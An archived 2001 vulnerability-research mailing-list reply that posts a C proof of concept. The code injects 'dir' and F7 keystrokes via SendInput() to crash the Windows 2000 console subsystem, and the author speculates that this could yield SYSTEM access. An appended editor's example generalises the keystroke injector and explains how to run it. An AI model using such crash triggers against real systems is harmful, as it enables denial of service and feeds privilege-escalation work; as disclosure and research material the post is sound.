Vulnerability Development: RE: bug w2k

RE: bug w2k

From: Vladimir Kraljevic <vladimir_kraljevic_at_llbudapest.hu>
Date: Wed, 1 Aug 2001 10:11:52 +0200

It works with the simulated keystrokes as well... I was able to track it
down up to the point where the subsystem crashes, but I have no more time to
spend on it.

I was able to get an access violation system box and delay the restart;
everyone with a decent kernel debugger (SoftICE and the like) can trace the
exact point of the crash. I'm pretty sure that you are getting the system
account. If I'm right, we'll soon have a nice exploit, useful to anyone that
has access to the CLI.

Enough for now; some work will follow, I have some ideas.

Vladimir

P.S. You can repeat the last two lines (SendInput(...))

=============================================================CUT HERE

#define _WIN32_WINNT 0x0401
#include <windows.h>
#include <winuser.h>
#include <winnt.h>
#include <string.h>   /* memset */

int main(void)
{
        //Simulate "dir\n": one key-down plus one key-up record per
        //keystroke, so eight INPUT records (the array was declared [7]
        //but filled up to index 7, overrunning it)

        INPUT inDirStrokes[8];
        memset(inDirStrokes, 0, sizeof(inDirStrokes));

        //VkKeyScan() returns the virtual-key code in the low byte and the
        //shift state in the high byte; only the low byte belongs in wVk
        inDirStrokes[0].type=INPUT_KEYBOARD;
        inDirStrokes[0].ki.dwFlags=0;
        inDirStrokes[0].ki.wVk=LOBYTE(VkKeyScan('d'));
        inDirStrokes[1].type=INPUT_KEYBOARD;
        inDirStrokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[1].ki.wVk=LOBYTE(VkKeyScan('d'));

        inDirStrokes[2].type=INPUT_KEYBOARD;
        inDirStrokes[2].ki.dwFlags=0;
        inDirStrokes[2].ki.wVk=LOBYTE(VkKeyScan('i'));
        inDirStrokes[3].type=INPUT_KEYBOARD;
        inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[3].ki.wVk=LOBYTE(VkKeyScan('i'));

        inDirStrokes[4].type=INPUT_KEYBOARD;
        inDirStrokes[4].ki.dwFlags=0;
        inDirStrokes[4].ki.wVk=LOBYTE(VkKeyScan('r'));
        inDirStrokes[5].type=INPUT_KEYBOARD;
        inDirStrokes[5].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[5].ki.wVk=LOBYTE(VkKeyScan('r'));

        inDirStrokes[6].type=INPUT_KEYBOARD;
        inDirStrokes[6].ki.dwFlags=0;
        inDirStrokes[6].ki.wVk=VK_RETURN;
        inDirStrokes[7].type=INPUT_KEYBOARD;
        inDirStrokes[7].ki.dwFlags=KEYEVENTF_KEYUP;
        inDirStrokes[7].ki.wVk=VK_RETURN;

        //Simulate "<F7>\n": F7 down/up, then Enter down/up

        INPUT inF7Strokes[4];
        memset(inF7Strokes, 0, sizeof(inF7Strokes));

        inF7Strokes[0].type=INPUT_KEYBOARD;
        inF7Strokes[0].ki.dwFlags=0;
        inF7Strokes[0].ki.wVk=VK_F7;
        inF7Strokes[1].type=INPUT_KEYBOARD;
        inF7Strokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
        inF7Strokes[1].ki.wVk=VK_F7;

        //The Enter records belong in inF7Strokes (the original wrote them
        //into inDirStrokes[2..3], clobbering the 'i' keystroke)
        inF7Strokes[2].type=INPUT_KEYBOARD;
        inF7Strokes[2].ki.dwFlags=0;
        inF7Strokes[2].ki.wVk=VK_RETURN;
        inF7Strokes[3].type=INPUT_KEYBOARD;
        inF7Strokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
        inF7Strokes[3].ki.wVk=VK_RETURN;

        //Each call injects a whole sequence into the focused window
        SendInput(sizeof(inDirStrokes)/sizeof(inDirStrokes[0]), inDirStrokes, sizeof(INPUT));
        SendInput(sizeof(inF7Strokes)/sizeof(inF7Strokes[0]), inF7Strokes, sizeof(INPUT));

        return 0;
}

=============================================================CUT HERE
Received on Aug 01 2001
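Added example (editor's code, not from Vladimir's post or from any project): the post hand-unrolls one INPUT record per key-down and key-up, which is where its array-size and array-name slips come from. The builder below produces the same SendInput() sequence from a string, sizes the record count from the text, and holds Shift around capitals. The helper names (set_key, vk_for_char, build_keystrokes, build_key_then_enter, send_sequence) are this example's own. It relies on the documented fact that the virtual-key codes for digits and letters equal their uppercase ASCII values, so it skips the layout-dependent VkKeyScan() call and rejects any other character; the non-Windows stand-in definitions of INPUT and the VK_/KEYEVENTF_ constants are an assumption made so the builder can be compiled and checked off a Windows box, where SendInput() is simply not called.

```c
/* Added example, not from the original post: build the SendInput()
 * record sequence from a string instead of hand-unrolling every key.
 * On Windows it compiles against <windows.h> and injects the keys; on
 * other platforms an assumed stand-in for INPUT and the few constants
 * used (values as in winuser.h) lets the builder compile for checking. */
#define _WIN32_WINNT 0x0500
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
typedef unsigned short WORD; typedef unsigned long DWORD;
typedef struct { WORD wVk; WORD wScan; DWORD dwFlags; DWORD time; void *dwExtraInfo; } KEYBDINPUT;
typedef struct { DWORD type; KEYBDINPUT ki; } INPUT;  /* stand-in: real INPUT wraps ki in a union */
#define INPUT_KEYBOARD   1
#define KEYEVENTF_KEYUP  0x0002
#define VK_SHIFT         0x10
#define VK_RETURN        0x0D
#define VK_SPACE         0x20
#define VK_F7            0x76
#endif

/* Fill one INPUT record with a key-down (flags 0) or key-up event. */
static void set_key(INPUT *in, WORD vk, DWORD flags)
{
    memset(in, 0, sizeof *in);
    in->type = INPUT_KEYBOARD;
    in->ki.wVk = vk;
    in->ki.dwFlags = flags;
}

/* Virtual-key code for a printable character. Letters and digits share
 * their uppercase ASCII code with the VK_ table, so no layout lookup is
 * needed; anything else would need VkKeyScan() and is rejected (0). */
static WORD vk_for_char(char c, int *need_shift)
{
    unsigned char uc = (unsigned char)c;
    *need_shift = 0;
    if (uc == '\n') return VK_RETURN;
    if (uc == ' ') return VK_SPACE;
    if (isdigit(uc)) return (WORD)uc;
    if (isalpha(uc)) {
        *need_shift = isupper(uc) != 0;
        return (WORD)toupper(uc);
    }
    return 0;
}

/* Encode text as key-down/key-up pairs (Shift held around capitals).
 * Returns the record count, or 0 if a character is unsupported or
 * out[] cannot hold the whole sequence (no partial overrunning sends). */
size_t build_keystrokes(const char *text, INPUT *out, size_t cap)
{
    size_t n = 0;
    for (; *text; ++text) {
        int shift;
        WORD vk = vk_for_char(*text, &shift);
        size_t need = shift ? 4 : 2;
        if (vk == 0 || n + need > cap) return 0;
        if (shift) set_key(&out[n++], VK_SHIFT, 0);
        set_key(&out[n++], vk, 0);
        set_key(&out[n++], vk, KEYEVENTF_KEYUP);
        if (shift) set_key(&out[n++], VK_SHIFT, KEYEVENTF_KEYUP);
    }
    return n;
}

/* A non-printing key (for example VK_F7) followed by Enter. */
size_t build_key_then_enter(WORD vk, INPUT *out, size_t cap)
{
    if (cap < 4) return 0;
    set_key(&out[0], vk, 0);
    set_key(&out[1], vk, KEYEVENTF_KEYUP);
    set_key(&out[2], VK_RETURN, 0);
    set_key(&out[3], VK_RETURN, KEYEVENTF_KEYUP);
    return 4;
}

/* Inject a sequence into the focused window; returns records sent
 * (always 0 on the non-Windows stand-in build, which sends nothing). */
unsigned send_sequence(INPUT *seq, size_t n)
{
#ifdef _WIN32
    return SendInput((UINT)n, seq, sizeof(INPUT));
#else
    (void)seq; (void)n;
    return 0;
#endif
}

int main(void)
{
    INPUT seq[64];
    size_t n = build_keystrokes("dir\n", seq, sizeof seq / sizeof seq[0]);
    if (n == 0) { fputs("unsupported character or buffer too small\n", stderr); return 1; }
    send_sequence(seq, n);                                  /* "dir" + Enter */
    n = build_key_then_enter(VK_F7, seq, sizeof seq / sizeof seq[0]);
    send_sequence(seq, n);                                  /* F7 + Enter */
    return 0;
}
```

On Windows, build it with a Win32 toolchain and run it from the cmd.exe console whose command history you are exercising: SendInput() delivers to whatever window currently has keyboard focus, so with the wrong window in front it just types "dir" somewhere else.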
